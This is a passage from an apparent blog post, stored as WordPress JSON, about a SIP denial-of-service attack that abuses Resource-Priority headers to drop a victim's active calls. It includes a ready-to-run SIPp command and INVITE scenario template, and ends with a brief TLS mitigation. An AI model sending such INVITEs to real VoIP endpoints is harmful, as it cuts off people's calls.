The WPS namespace derives its name from the “Wireless Priority Service”, defined in GSM and other wireless technologies.<\/p>\n
(lowest) wps.4\n wps.3\n wps.2\n wps.1\n (highest) wps.0<\/pre>\nIn each originating call, the namespace and the priority information is placed into the INVITE message and then sent. The signalling message (INVITE) received by the SIP proxy is passed to the terminating end. At that point terminating side has to decide whether the newly arrived call is more important than an already established one.<\/p>\n
In general, when INVITE message is received by a client, the “from” data is not examined very well from security point of view (it only checks the proxy address and the domain). The reason is, if it was wrong, the connection could not be established since the reply packet would never go to the correct party and the RTP would never be established.<\/p>\n
However, when the terminating side receives a MLPP high priority call information with the INVITE message, it just drops the existing call and then tries to establish the new high priority one. It is then time to establish media path if all the information in INVITE is correct.<\/p>\n
So an attacker can cause denial of service on a specific SIP client by sending continuous INVITE messages with high priority resource headers. The attacker should only know the IP address, user name and the SIP domain of the victim which can be obtained easily by several techniques.<\/p>\n
In the following lines, you can find the attack template for the tool called SIPp which is a free Open Source test tool \/ traffic generator for the SIP protocol. Here is the message template of the attack for SIPp.<\/p>\n
# sipp 192.168.5.145 -sf D:\/calling.txt -inf D:\/calling.csv -m 1 -p 5060 -i 192.168.5.17<\/p>\n
<?xml version=\"1.0\" ?>\n<!DOCTYPE scenario SYSTEM \"sipp.dtd\">\n\n<scenario name=\"calling\"> \n<send retrans=\"500\">\n<![CDATA[ \nINVITE sip:[field0]@[field1] SIP\/2.0\nVia: SIP\/2.0\/[transport] [local_ip]:[local_port];branch=[branch]\nFrom: <sip:[field0]@[field1]>;tag=tmmW43DkM\nTo: <sip:[field2]@[field1]:[remote_port]>\nCSeq: 20 INVITE\nCall-ID: hb-1Thh3dE\nMax-Forwards: 70\nSupported: outbound\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO, UPDATE\nContent-Type: application\/sdp\nContent-Length: 556\nContact: <sip:[field0]@[local_ip]:[local_port]>;+sip.instance=\"<urn:uuid:1894ae7a-7a63-1155-a07d-2baf7953c0fb>\"\nUser-Agent: [user_agent]\nResource-Priority: q735.0\nRequire: resource-priority\n\nv=0\no=[field0] 517348 0 IN IP4 192.168.5.2\ns=unknown@invalid\ne=unknown@invalid\nc=IN IP4 192.168.5.2\nt=0 0\nm=audio 50002 RTP\/AVP 0 8 18 110 111\nc=IN IP4 192.168.2.2\na=rtpmap:0 PCMU\/8000\na=rtpmap:8 PCMA\/8000\na=rtpmap:18 G729\/8000\na=rtpmap:110 telephone-event\/8000\na=rtpmap:111 X-nt-inforeq\/8000\na=ptime:20\na=sendrecv\nm=video 0 RTP\/AVP 34\nc=IN IP4 192.168.5.2\nb=AS:66\nb=TIAS:65536\na=rtpmap:34 H263\/90000\na=fmtp:34 QCIF=3;SQCIF=3;CIF=3;F=1\na=maxprate:8.00\n]]>\n<\/send>\n\n<recv response=\"100\" optional=\"true\"\/>\n<recv response=\"180\" optional=\"true\"\/>\n<recv response=\"183\" optional=\"true\"\/>\n<recv response=\"200\"\/>\n\n<send>\n<![CDATA[\nACK sip:[field2]@[field1] SIP\/2.0\nFrom: [field0] <sip:[field0]@[field1]:[local_port]>;tag=[call_number]\nTo: <sip:[field2]@[field1]>\n[last_Call-ID:]\n[last_Via:]\nCSeq: [cseq] ACK\nContent-Length: [len]\nContact: <sip:[field2]@[local_ip]:[local_port]>\nMax-Forwards: 30\n\n]]>\n<\/send>\n\n<\/scenario><\/pre>\n <\/p>\n
You will see that there are fields called “field0”, “field1”, “remote_port”, “local_ip”, and etc. You can define variables in a separate file (in my case it is calling.csv) and pass them to SIPp on the command line. These fields are required in order you to form this message.<\/p>\n
As you can see, the resource priority header on the sip call is “q735.0” which is the highest priority for q735 namespace. When the victim receives this priority header in the INVITE message, it drops the active low priority call on the victim’s SIP client.<\/p>\n
The prevention is actually not too complex. All user agents and proxy servers that support this extension must implement SIP over TLS [RFC3546<\/a>]. However, SIP TLS brings capacity concerns due to its computational requirements for encryption and decryption.<\/p>\n <\/p>\n","protected":false},"excerpt":{"rendered":"Today we can easily say that SIP is the leading protocol on the VoIP systems. The success of SIP is certainly result of simple and robust architecture of this protocol. However, like every other protocol SIP has several weaknesses.\n","protected":false},"author":3,"featured_media":202,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[28,27,13,19],"_links":{"self":[{"href":"http:\/\/192.168.10.2\/wp-json\/wp\/v2\/posts\/121"}],"collection":[{"href":"http:\/\/192.168.10.2\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/192.168.10.2\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/192.168.10.2\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/192.168.10.2\/wp-json\/wp\/v2\/comments?post=121"}],"version-history":[{"count":34,"href":"http:\/\/192.168.10.2\/wp-json\/wp\/v2\/posts\/121\/revisions"}],"predecessor-version":[{"id":223,"href":"http:\/\/192.168.10.2\/wp-json\/wp\/v2\/posts\/121\/revisions\/223"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/192.168.10.2\/wp-json\/wp\/v2\/media\/202"}],"wp:attachment":[{"href":"http:\/\/192.168.10.2\/wp-json\/wp\/v2\/media?parent=121"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/192.168.10.2\/wp-json\/wp\/v2\/categories?post=121"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/192.168.10.2\/wp-json\/wp\/v2\/tags?post=121"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}